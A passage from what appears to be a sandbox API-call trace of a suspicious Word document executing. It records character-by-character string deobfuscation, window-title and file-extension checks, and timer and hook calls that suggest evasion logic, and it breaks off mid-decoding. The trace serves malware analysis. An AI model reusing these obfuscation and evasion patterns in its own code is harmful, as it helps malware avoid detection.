cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.021] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0202.021] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.022] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0202.022] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.023] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0202.024] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.024] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0202.024] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.025] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0202.025] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.026] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0202.026] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.026] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0202.027] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.027] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0202.027] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.028] GetForegroundWindow () returned 0x2035c [0202.028] GetLastError () returned 0x0 [0202.028] SysStringLen (param_1=" ") returned 0xff [0202.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0202.028] SysStringLen (param_1=" ") returned 0xff [0202.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0202.028] GetWindowTextA (in: hWnd=0x2035c, lpString=0x11644c4, nMaxCount=255 | out: lpString="Desktop") returned 7 [0202.028] GetLastError () returned 0x0 [0202.029] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0202.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0202.029] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0202.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Desktop") returned 256 [0202.029] SysStringLen (param_1="De") returned 0x2 [0202.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="De", cchWideChar=3, lpMultiByteStr=0x116854c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="De", lpUsedDefaultChar=0x0) returned 3 [0202.029] SetWindowTextA (hWnd=0x103c4, lpString="De") returned 1 [0202.030] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0202.030] GetFocus () returned 0x0 [0202.030] lstrlenA (lpString="De") returned 2 [0202.030] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116854c) returned 0x1 [0202.030] IsWindow (hWnd=0x103c4) returned 1 [0202.030] IsWindow (hWnd=0x103c4) returned 1 [0202.031] IsWindow (hWnd=0x103c4) returned 1 [0202.031] IsWindow (hWnd=0x103c4) returned 1 [0202.031] GetFocus () returned 0x0 [0202.031] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0202.032] GetFocus () returned 0x0 [0202.032] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0202.032] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0202.032] GetFocus () returned 0x0 [0202.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="De", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0202.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="De", cbMultiByte=-1, lpWideCharStr=0x116854c, cchWideChar=3 | out: lpWideCharStr="De") returned 3 [0202.032] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0202.032] VarBstrCmp (bstrLeft="De", bstrRight="Sc", lcid=0x0, dwFlags=0x30001) returned 0x0 [0202.032] SetTimer (hWnd=0x103bc, nIDEvent=0x103bc, uElapse=0x64, lpTimerFunc=0x0) returned 0x103bc [0202.033] PeekMessageA (in: lpMsg=0x28f564, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f564) returned 1 [0202.033] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x0, lParam=0x28f4cc) returned 0x0 [0202.033] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 1 [0202.033] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28f54c) returned 0x0 [0202.033] TranslateMessage (lpMsg=0x28f5e8) returned 0 [0202.033] DispatchMessageA (lpMsg=0x28f5e8) returned 0x1 [0202.033] GetExitCodeThread (in: hThread=0x124, lpExitCode=0x28f4c0 | out: lpExitCode=0x28f4c0) returned 1 [0202.034] ResumeThread (hThread=0x124) returned 0x0 [0202.034] SetThreadPriority (hThread=0x124, nPriority=0) returned 1 [0202.034] PeekMessageA (in: lpMsg=0x28f564, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f564) returned 0 [0202.034] GetTickCount () returned 0x1d1f17e [0202.035] IsWindowVisible (hWnd=0x103b8) returned 0 [0202.035] Sleep (dwMilliseconds=0x0) [0202.076] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22cdc, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0202.077] FileSystemObject:IDispatch:Invoke (in: This=0xf22cdc, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\a0jrdmcvv1habm5.doc"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0202.079] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0202.080] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="doc", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0202.080] CharUpperBuffW (in: lpsz="doc", cchLength=0x4 | out: lpsz="DOC") returned 0x4 [0202.081] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0202.081] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 0 [0202.081] GetTickCount () returned 0x1d1f1ad [0202.081] GetTickCount () returned 0x1d1f1ad [0202.082] GetTickCount () returned 0x1d1f1ad [0202.082] GetTickCount () returned 0x1d1f1ad [0202.082] IsWindowVisible (hWnd=0x103b8) returned 0 [0202.082] Sleep (dwMilliseconds=0x0) [0202.084] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22cdc, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0202.084] FileSystemObject:IDispatch:Invoke (in: This=0xf22cdc, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\a0jrdmcvv1habm5.doc"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0202.086] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0202.086] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="doc", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0202.086] CharUpperBuffW (in: lpsz="doc", cchLength=0x4 | out: lpsz="DOC") returned 0x4 [0202.086] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0202.087] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 0 [0202.087] GetTickCount () returned 0x1d1f1bd [0202.087] GetTickCount () returned 0x1d1f1bd [0202.087] GetTickCount () returned 0x1d1f1bd [0202.087] GetTickCount () returned 0x1d1f1bd [0202.088] IsWindowVisible (hWnd=0x103b8) returned 0 [0202.088] Sleep (dwMilliseconds=0x0) [0202.233] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22cdc, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0202.233] FileSystemObject:IDispatch:Invoke (in: This=0xf22cdc, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\A0jRdmcvV1haBm5.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\a0jrdmcvv1habm5.doc"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0202.236] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0202.237] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="doc", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0202.237] CharUpperBuffW (in: lpsz="doc", cchLength=0x4 | out: lpsz="DOC") returned 0x4 [0202.238] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0202.240] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 1 [0202.240] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28f54c) returned 0x0 [0202.241] IsWindow (hWnd=0x103bc) returned 1 [0202.241] GetWindowLongA (hWnd=0x103bc, nIndex=-16) returned 1140916224 [0202.241] IsIconic (hWnd=0x103b8) returned 0 [0202.241] GetParent (hWnd=0x103bc) returned 0x103b8 [0202.241] TranslateMessage (lpMsg=0x28f5e8) returned 0 [0202.241] DispatchMessageA (lpMsg=0x28f5e8) [0202.242] KillTimer (hWnd=0x103bc, uIDEvent=0x103bc) returned 1 [0202.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.244] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0202.244] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.245] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0202.245] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.246] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0202.246] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.247] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0202.247] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.248] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0202.248] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.249] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0202.249] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) 